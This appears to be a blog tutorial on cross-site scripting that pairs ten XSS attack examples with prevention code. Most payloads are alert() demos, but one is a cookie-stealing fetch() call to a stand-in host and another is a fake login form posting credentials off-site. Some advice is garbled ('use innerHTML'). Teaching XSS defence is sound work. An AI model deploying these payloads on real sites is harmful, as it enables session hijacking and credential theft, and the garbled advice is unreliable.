
What is XSS (Cross Site Scripting)? How to hack real examples and ways to prevent it
Every day, we log in, write comments, and fill out forms while using the internet. But did you know your website can be hacked from just a small input box?
This is where XSS (Cross-Site Scripting) comes in. In this article, we will learn what XSS is, how it works, how hackers actually use XSS & and 10 real-life XSS attack examples, and the most important part is how to prevent XSS.
What is XSS (Cross-Site Scripting)?
%20definations.webp)
XSS is a web security vulnerability where a hacker injects malicious JavaScript (js) code into a website, which then runs in the visitor’s browser.
You have created a website well, with a very nice look and in a professional manner, but through the website, a hacker runs code in your browser, and this XSS attack is mainly caused by the website’s weak security.
How does XSS work?
Let’s say a website has a comment section. If the developer/you don’t filter the input, a hacker can write JavaScript code. Comment box is –
<input type="text" name="comment">Hacker Write JS Code –
<script>alert('Hacked')</script>This code will be saved in the database, and when other users load that page, the script will run in their browser.
There are three main types of XSS –
- Stored XSS – Code is saved in the database
- Reflected XSS – Comes from a URL or request
- DOM-based XSS – Through JavaScript DOM manipulation
Now, let’s discuss 10 real-life XSS hacking examples. Here, we will demonstrate how XSS exploits hacking tricks and how to prevent them.
1. Comment Box XSS (Stored XSS)
Hackers write code like this in a blog comment box –
<script>alert('XSS attack')</script>This comment is saved in a database. Later, when anyone reads that post, the script runs in their browser, and the user’s information is hijacked.
How to prevent this? Be sure to do this before saving the comment. But if HTML is required, only allow whitelist tags.
htmlspecialchars($comment, ENT_QUOTES, ‘UTF-8’);
2. Session Cookie Stolen (Account Hijacking)
How does a hacker attack this method? If the user is logged in, then that user’s session cookie is stolen. Hackers inject this type of code –
<script>
fetch("https://demo-google.com?c="+document.cookie);
</script>How to prevent?
Set HttpOnly on cookies and use CSP-
setcookie("session", $val, ["httponly"=>true]);3. Search Box Reflected XSS
If you print any variable directly in this method, then there is danger! For example, if you type the following content directly into the search results, the script will run –
site.com/search?content=<script>alert(1)</script>How to prevent?
Encode output, and never echo/print raw URL input –
echo htmlspecialchars($_GET['content']);4. Admin Panel XSS Attack
Is it surprising how the admin panel is attacked? It’s really surprising, but this attack is real and can create a terrible situation. The hacker inserts a script into the user profile name field. When the admin sees the user list, the script runs.
How to prevent?
Even if it is an admin panel, input sanitization is mandatory. Must use htmlentities() in the admin panel view.
5. Fake Login Form Injection
Hacker modifies the DOM with XSS code,
Then the user thinks it is the real site, but the data is going to the hacker.
<form action="fake-google.com">
<input name="email">
<input name="pass">
</form>How to prevent?
Block external forms with CSP and Disable inline scripts.
6. DOM-based XSS (JavaScript Error)
Let’s understand how this method is attacked –
document.getElementById("msg").innerHTML = location.hash;
URL:#<script>alert(1)</script>How to prevent?
Don’t forget to use innerHTML and add Client-side validation.
document.getElementById("msg").textContent = value;7. Chat Application XSS
Oh my God, can you get hacked through chatting, too? You heard right, see how to send it as a chat message. This will run the code in all user’s browsers –
<img src=x onerror=alert(1)>How to prevent?
Use Strip HTML and Use Markdown parser (don’t use raw HTML)
8. File Upload Name XSS
You will be surprised to know how the attack is done by using the file name. If you show the name in the file list, the script will run, and you will immediately become a victim of hacking –
"><script>alert(1)</script>.jpgHow to prevent?
Rename the file name, and never echo the User filename –
$filename = uniqid().".jpg";9. URL Preview / Share XSS
When generating a website URL preview, the meta tag from user input is displayed, which is the cause of the problem.
How to prevent?
Encode metadata, And use sanitizer when parsing External HTML
10. Notification / Toast Message XSS
If you show data directly with Frontend JS, unknown code will run –
{"msg":"<script>alert(1)</script>"}How to prevent?
Treat JSON data as text and JS side escape.
If you code following these important XSS Prevention Rules, it is possible to protect against hacking by 90 percent.
- Never trust user input
- Input sanitize + Output encode
- Avoid innerHTML
- HttpOnly + Secure cookie
- Use CSP
- Don’t bypass framework security.
Why is XSS so dangerous?
- No user clicks required
- XSS can still happen even with HTTPS
- Antivirus can’t block XSS, once raw code is entered, thousands of users are affected
- 90% of XSS hacking occurs due to developer carelessness.
Why is XSS harmful for SEO and business?
- Google can blacklist the site,
- User trust is lost,
- Bounce rate increases,
- Brand reputation is destroyed,
- A small XSS bug can end an entire business.
XSS is not a theory – it’s real, dangerous, and very common.
If you’re a developer, make input-output validation a habit today.
And if you are a website owner – ask the developer:
“Is XSS prevention done properly?”
Security is not an option – it is mandatory.








